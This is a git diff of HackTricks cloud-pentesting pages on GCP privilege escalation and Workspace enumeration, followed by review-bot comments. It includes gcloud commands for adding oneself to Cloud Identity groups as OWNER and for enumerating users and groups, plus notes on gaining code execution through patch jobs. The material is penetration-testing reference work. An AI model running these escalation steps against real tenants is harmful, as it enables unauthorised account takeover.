### Network Access diff --git a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md index f518f8210f..41b2bed19d 100644 --- a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -66,7 +66,7 @@ The exploit script for this method can be found [here](https://github.com/RhinoS ### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec` -If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. +If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json) for a patch job run: @@ -112,6 +112,10 @@ Use this permission to **get the previous permissions.** `TODO` +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-basic-information.md b/pentesting-cloud/gcp-security/gcp-basic-information.md index c3dca463d8..3f796dda9b 100644 --- a/pentesting-cloud/gcp-security/gcp-basic-information.md +++ b/pentesting-cloud/gcp-security/gcp-basic-information.md @@ -60,6 +60,68 @@ In order to **define** an organization policy, **you choose a** [**constraint**] There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.** +### **Default Organization Policies** + +
+ +These are the policies that Google will add by default when setting up your GCP organization: + +**Access Management Policies** + +* **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications. +* **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization. +* **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access. +* **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets. +* **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys. + +**Additional security policies for service accounts** + +* **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation. +* **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials. +* **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material. 
+ +**Secure VPC network configuration policies** + +* **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic. + + + +* **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs. + + + +* **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API. + + + +* **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases. + + + +* **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses. + + + +* **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic. + + + +* **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects. + + + +* **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability. + + + +* **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules. + + + +* **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access. + +
+ ## **IAM Roles** These are like IAM policies in AWS as **each role contains a set of permissions.** @@ -96,11 +158,21 @@ You can access Workspaces **users and groups in** [**https://admin.google.com**] When an organisation is created several groups are **strongly suggested to be created.** If you manage any of them you might have compromised all or an important part of the organization: -
GroupFunction
grp-gcp-organization-admins
(group or individual accounts required for checklist)
Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.
grp-gcp-network-admins
(required for checklist)
Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.
grp-gcp-billing-admins
(required for checklist)
Setting up billing accounts and monitoring their usage.
grp-gcp-developers
(required for checklist)
Designing, coding, and testing applications.
grp-gcp-security-admins
Establishing and managing security policies for the entire organization, including access management and organization constraint policies. See the Google Cloud security foundations guide for more information about planning your Google Cloud security infrastructure.
grp-gcp-devopsCreating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.
grp-gcp-billing-viewerMonitoring the spend on projects. Typical members are part of the finance team.
grp-gcp-platform-viewerReviewing resource information across the Google Cloud organization.
grp-gcp-security-reviewerReviewing cloud security.
grp-gcp-network-viewerReviewing network configurations.
grp-gcp-audit-viewerViewing audit logs.
grp-gcp-scc-adminAdministering Security Command Center.
grp-gcp-secrets-adminManaging secrets in Secret Manager.
+
GroupFunction
gcp-organization-admins
(group or individual accounts required for checklist)
Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.
gcp-network-admins
(required for checklist)
Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.
gcp-billing-admins
(required for checklist)
Setting up billing accounts and monitoring their usage.
gcp-developers
(required for checklist)
Designing, coding, and testing applications.
gcp-security-admins
Establishing and managing security policies for the entire organization, including access management and organization constraint policies. See the Google Cloud security foundations guide for more information about planning your Google Cloud security infrastructure.
gcp-devopsCreating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.
gcp-logging-admins
gcp-logging-viewers
gcp-monitor-admins
gcp-billing-viewer
(no longer by default)
Monitoring the spend on projects. Typical members are part of the finance team.
gcp-platform-viewer
(no longer by default)
Reviewing resource information across the Google Cloud organization.
gcp-security-reviewer
(no longer by default)
Reviewing cloud security.
gcp-network-viewer
(no longer by default)
Reviewing network configurations.
grp-gcp-audit-viewer
(no longer by default)
Viewing audit logs.
gcp-scc-admin
(no longer by default)
Administering Security Command Center.
gcp-secrets-admin
(no longer by default)
Managing secrets in Secret Manager.
## **Default Password Policy** -
+* Enforce strong passwords +* Between 8 and 100 characters +* No reuse +* No expiration +* If people is accessing Workspace through a third party provider, these requirements aren't applied. + +
+ +
+ + ## **Service accounts** diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index e734a211df..2711ea5858 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -55,6 +55,10 @@ Give yourself any of the previous .update or .create privileges to escalate. An attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and will be able to **execute arbitrary** code once it's executed. +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md new file mode 100644 index 0000000000..c45172e7cb --- /dev/null +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md @@ -0,0 +1,62 @@ +# GCP - Cloudidentity Privesc + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## Cloudidentity + +For more information about the cloudidentity service, check this page: + +{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} +[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) +{% endcontent-ref %} + +### Add yourself to a group + +If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: + +{% code overflow="wrap" %} +```bash +gcloud identity groups memberships add --group-email --member-email [--roles OWNER] +# If --roles isn't specified you will get MEMBER +``` +{% endcode %} + +### Modify group membership + +If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: + +{% code overflow="wrap" %} +```bash +# Check the current membership level +gcloud identity groups memberships describe --member-email --group-email + +# If not OWNER try +gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER +``` +{% endcode %} + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
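Review bot: in the new file gcp-cloudidentity-privesc.md, both code blocks leave `--group-email` and `--member-email` without values (`gcloud identity groups memberships add --group-email --member-email [--roles OWNER]`), so a copied command fails at argument parsing; use placeholders such as `--group-email=GROUP_EMAIL --member-email=MEMBER_EMAIL`. The page also never states the prerequisite that the Cloud Identity API is enabled in the project (`gcloud services enable cloudidentity.googleapis.com`, which the gcp-iam-and-org-policies-enum.md hunk in this same change adds); link that from the "Cloudidentity" intro. Style: use "they" instead of "he" in both "If your user has enough permissions..." sentences.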
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md index 811afbe289..fac443e976 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md @@ -34,6 +34,10 @@ Check a script to automate the [**creation, exploit and cleaning of a vuln envir This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section. +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index eb9d08207f..b04e676ef2 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md @@ -116,6 +116,10 @@ Some services that support authentication via this kind of tokens are: You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py). +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md index db4af53c98..c90d5b3d54 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md @@ -26,6 +26,10 @@ The screenshot above shows that the _appengine.disableCodeDownload_ constraint i The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). +## References + +* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 4f6097473b..0a97ff9249 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -74,6 +74,10 @@ gcloud beta run jobs update hacked \ Give yourself the previous permissions. +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md index fc8310527c..b7f66cbd95 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md @@ -44,6 +44,14 @@ The screenshot above shows that the request is exactly the same as before, it ju The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py). +### **`serviceusage.services.enable`** , **`serviceusage.services.use`** + +With these permissions an attacker can enable and use new services in the project. This could allow an attacker to enable service like admin or cloudidentity to access Workspace information, or other services to access interesting data. + +## **References** + +* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +
Support HackTricks and get benefits! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index 2eb4ce4e94..cd76489d57 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -81,6 +81,10 @@ If you can modify or add objects in buckets, you might be able to escalate your * **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.** +## **References** + +* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md index 1e1f54e6f2..e4c72f214b 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md +++ b/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md @@ -1,4 +1,4 @@ -# GCP - IAM, Ppals & Org Policies Enum +# GCP - IAM, Principals & Org Policies Enum
@@ -40,31 +40,44 @@ For an intro about how Users & Groups work in GCP check: ### Enumeration -With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`**it's possible to **enable services** in a project and use them. +With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`** it's possible to **enable services** in a project and use them. If you can **enable the `admin` service** and if your user has **enough privileges in workspace,** you could **enumerate all groups & users** with the following lines.\ Even if it says **`identity groups`**, it also returns **users without any groups**: +{% code overflow="wrap" %} ```bash # Enable admin gcloud services enable admin.googleapis.com -# List all users & groups +gcloud services enable cloudidentity.googleapis.com + +# Using admin.googleapis.com +## List all users gcloud organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID gcloud beta identity groups preview --customer -## Group Members -gcloud identity groups memberships search-transitive-memberships --group-email=email@group.com + +# Using cloudidentity.googleapis.com +## List groups of a user +gcloud identity groups memberships search-transitive-groups --member-email --labels=cloudidentity.googleapis.com/groups.discussion_forum + +## List Group Members +gcloud identity groups memberships list --group-email= +### Make it transitive +gcloud identity groups memberships search-transitive-memberships --group-email= + +## Get a graph (if you have enough permissions) +gcloud identity groups memberships get-membership-graph --member-email= --labels=cloudidentity.googleapis.com/groups.discussion_forum ``` +{% endcode %} + +{% hint style="success" %} +In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in 
here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc\_groups\_users.py). +{% endhint %} Even with the admin service enable, it's possible that you get an error enumerating them because your compromised workspace user doesn't have enough permissions:
-If you can enable the service **`cloudidentity.googleapli.com`** if disabled, you could use it to **enumerate groups** (like it's done in PurplePanda in [here](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc\_groups\_users.py)): - -``` -gcloud services enable cloudidentity.googleapis.com -``` - ## IAM Check [**this for basic information about IAM**](../gcp-basic-information.md#iam-roles).
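Review bot: in the gcp-compute-privesc README hunk at `@@ -66,7 +66,7 @@`, the replaced paragraph (`-If you have the **osconfig.patchDeployments.create** ...` / `+If you have the **osconfig.patchDeployments.create** ...`) is identical apart from trailing whitespace, so this part of the change is a no-op that only adds noise to the diff; drop it, or make the intended wording change here if there was one.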
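Review bot: in the gcp-basic-information.md hunk at `@@ -60,6 +60,68 @@`, the lead sentence `+These are the policies that Google will add by default when setting up your GCP organization:` should say explicitly that they are applied to newly created organizations, so an organization created earlier, or a folder or project where an admin has overridden the inherited policy, may have none of them; anyone assessing or hardening an org should list the effective constraints (for example `gcloud resource-manager org-policies list --organization=ORG_ID`) rather than assume these defaults. Also, the image placeholders inserted between the "Secure VPC network configuration policies" bullets split that list into ten separate one-item lists in markdown; keep the bullets contiguous and place the images after the list.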
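Review bot: in the gcp-basic-information.md hunk at `@@ -96,11 +158,21 @@`, the new table rows `gcp-logging-admins`, `gcp-logging-viewers` and `gcp-monitor-admins` have an empty Function cell, so the reader cannot tell what compromising those groups grants; give each a one-line description as every row of the removed table had. The row `grp-gcp-audit-viewer` also keeps the old `grp-` prefix while every other row was renamed to the `gcp-` form; check whether that is intentional.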
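Review bot: in the gcp-basic-information.md "Default Password Policy" hunk, the last bullet `+* If people is accessing Workspace through a third party provider, these requirements aren't applied.` needs a grammar fix ("If users access Workspace through a third-party identity provider, these requirements are not applied.") and should say what applies instead, namely the third-party provider's own password policy, since the reader otherwise cannot tell whether "No expiration" and the 8-character minimum still hold for federated users.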
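Review bot: in the gcp-orgpolicy-privesc.md References hunk, the link label carries a text-fragment `#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.` that scrolls to the apiKeys.create section of the part-2 post, which is unrelated to org policies; use the plain URL (the link target already is the plain URL) as the label.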
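Review bot: in the gcp-serviceusage-privesc.md hunk, the new `serviceusage.services.enable`, `serviceusage.services.use` section says enabling `admin` or `cloudidentity` gives access to Workspace information but does not show how or point at the enumeration commands this same change adds to gcp-iam-and-org-policies-enum.md; add a content-ref to that page. It should also note that enabling the API is only the first step: the directory queries still run as the caller, so they fail when the principal lacks Workspace privileges (the caveat the enum page itself states). Grammar: `enable service like admin or cloudidentity` → `enable services such as admin or cloudidentity`. The References label here carries the same unrelated `#:\~:text=apiKeys.-,create,...` fragment as the orgpolicy hunk; use the plain URL.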
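Review bot: in the gcp-storage-privesc.md References hunk, the link label again includes the `#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.` fragment, which points at the apiKeys.create section rather than anything about Storage; use the plain URL as the label, as the link target already does.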
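Review bot: in the gcp-iam-and-org-policies-enum.md hunk at `@@ -40,31 +40,44 @@`, the new comment `+## List all users` sits above `gcloud organizations list` and `gcloud beta identity groups preview --customer`, which list organizations and groups (the removed comment read `List all users & groups`), so the comment is now misleading; restore the wording and give `--customer` a placeholder (`--customer=DIRECTORY_CUSTOMER_ID`), since the line is not runnable as written. The added cloudidentity commands likewise leave `--member-email` and `--group-email=` empty. In the hint, `it's not requires` → `it's not required`, and the parenthesis opened before "it's not required if you used the API directly" is never closed after the PurplePanda link.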